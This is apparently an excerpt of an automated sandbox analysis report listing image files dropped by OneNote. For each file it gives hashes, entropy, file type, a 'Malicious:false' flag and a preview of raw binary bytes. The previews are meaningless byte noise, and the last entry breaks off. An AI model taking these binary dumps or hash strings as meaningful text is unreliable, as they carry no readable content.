                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60924
                                                                                                        Entropy (8bit):7.758472758205366
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                        MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                        SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                        SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                        SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):49224
                                                                                                        Entropy (8bit):7.402134460714453
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                        MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                        SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                        SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                        SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                        Malicious:false
                                                                                                        Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):784
                                                                                                        Entropy (8bit):6.962539208465222
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                        MD5:14105A831FE32590E52C2E2E41879624
                                                                                                        SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                        SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                        SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):24268
                                                                                                        Entropy (8bit):6.946124661664625
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                        MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                        SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                        SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                        SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15740
                                                                                                        Entropy (8bit):6.0674556182683945
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                        MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                        SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                        SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
